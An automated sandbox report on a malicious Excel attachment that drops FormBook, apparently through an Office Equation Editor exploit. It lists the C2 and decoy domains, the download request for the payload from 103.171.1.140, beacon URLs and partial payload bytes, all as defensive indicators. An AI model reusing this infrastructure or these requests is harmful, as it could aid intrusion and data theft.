Windows Analysis Report New order - C.S.I No. 04183.xlsx

AV Detection:

Found malware configuration

Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.celikkaya.xyz/og2w/"], "decoy": ["drivenexpress.info", "pdfproxy.com", "zyz999.top", "oceanserver1.com", "948289.com", "nubilewoman.com", "ibizadiamonds.com", "bosniantv-australia.com", "juliehutzell.com", "poshesocial.events", "icsrwk.xyz", "nap-con.com", "womansslippers.com", "invictusfarm.com", "search-panel-avg-rock.rest", "desencriptar.com", "imperialexoticreptiles.com", "agastify.com", "strinvstr.com", "julianapeloi.com", "myproperty99.com", "mahardikasantoso.com", "pathway-strategies.com", "runbusinessonline.com", "facenbook.xyz", "texasschnauzer.com", "whoyummy.top", "hiscomsvc.com", "644557.com", "shouyeshow.com", "emtek.site", "inspireabossglobal.us", "sellmyhouse365.net", "ambergrids.xyz", "shoptrendyshop.com", "b7eb8.com", "crystalsbyzoe.com", "awfullive.site", "rebelgreens.com", "depressiqwidv.xyz", "mvp69bet.com", "selectedandprotected.com", "china-jiahe.com", "brandonknicely.com", "redrodventuresllc.com", "tomafer.net", "makemeorgasm.net", "wihomeoffers.com", "bamko.link", "secure-01.net", "fridayhabit.com", "mudeevehkuwpitcicet.site", "inversioneskomp.com", "oojry.xyz", "jibony.com", "cellphoneplansiusaweb.com", "lianemuhill.com", "caroeventos.com", "thucphamsachkhaihuy.com", "musicjem.com", "hbbtv.xyz", "meltemilebaskalasim.com", "xn--38j0b6c.com", "checkupfromtheneckup.net"]}

Multi AV Scanner detection for submitted file

Source: New order - C.S.I No. 04183.xlsx	Virustotal: Detection: 36%			Perma Link
Source: New order - C.S.I No. 04183.xlsx	ReversingLabs: Detection: 36%

Yara detected FormBook

Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://103.171.1.140/384500000_1/.vbc.exe	Avira URL Cloud: Label: malware
Source: http://www.oojry.xyz/og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: http://103.171.1.140/384500000_1/.vbc.exe

Virustotal: Detection: 8%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.2980000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.cscript.exe.3e22f0.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.vbc.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.0.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 5.0.vbc.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.cscript.exe.2a4f840.7.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.vbc.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.459887685.00000000002B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495263706.00000000008C0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.460925066.00000000005B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000007.00000003.494990015.00000000004B0000.00000004.00000001.sdmp, cscript.exe, 00000007.00000002.663624666.0000000002490000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, cscript.exe, 00000007.00000003.495952417.0000000002180000.00000004.00000001.sdmp
Source:	Binary string: cscript.pdbN source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp
Source:	Binary string: cscript.pdb source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp

Spreading:

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		4_2_00405250
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C22 FindFirstFileA,FindClose,		4_2_00405C22
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402630 FindFirstFileA,		4_2_00402630

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: www.oojry.xyz

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi		5_2_00416CDC
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi		5_1_00416CDC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4x nop then pop edi		7_2_00086CDC

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 103.171.1.140:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 103.171.1.140:80

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.82.75 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.oojry.xyz
Source: C:\Windows\explorer.exe	Domain query: www.crystalsbyzoe.com
Source: C:\Windows\explorer.exe	Network Connect: 34.246.239.131 80			Jump to behavior

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.oojry.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.celikkaya.xyz/og2w/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN HTTP/1.1Host: www.oojry.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MN HTTP/1.1Host: www.crystalsbyzoe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 18:23:23 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Thu, 25 Nov 2021 04:13:29 GMTETag: "7431e-5d195326272a0"Accept-Ranges: bytesContent-Length: 475934Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cd cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 84 02 00 00 04 00 00 e3 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 70 03 00 70 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 70 a0 02 00 00 70 03 00 00 a2 02 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /384500000_1/.vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.171.1.140Connection: Keep-Alive

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlDate: Thu, 25 Nov 2021 18:25:03 GMTServer: nginxVary: Accept-EncodingContent-Length: 159Connection: CloseData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.17.8.2</center></body></html>

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown	TCP traffic detected without corresponding DNS query: 103.171.1.140

Found strings which match to known social media urls

Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

URLs found in memory or binary data

Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.452164123.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.456325593.0000000000409000.00000008.00020000.sdmp, cscript.exe, 00000007.00000002.662137853.00000000003E2000.00000004.00000020.sdmp, cscript.exe, 00000007.00000002.664107030.0000000002A4F000.00000004.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.452164123.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.456325593.0000000000409000.00000008.00020000.sdmp, cscript.exe, 00000007.00000002.662137853.00000000003E2000.00000004.00000020.sdmp, cscript.exe, 00000007.00000002.664107030.0000000002A4F000.00000004.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.460925323.0000000002140000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.473837020.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.484932398.0000000003E50000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662313228.0000000001E70000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.500166360.0000000001E70000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.460925323.0000000002140000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.473837020.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.478068609.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.469685487.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.480261160.0000000008438000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.531572707.0000000004513000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.478068609.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.480261160.0000000008438000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C56E6BA.emf

Jump to behavior

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.oojry.xyz

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /384500000_1/.vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.171.1.140Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN HTTP/1.1Host: www.oojry.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MN HTTP/1.1Host: www.crystalsbyzoe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_00404E07

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
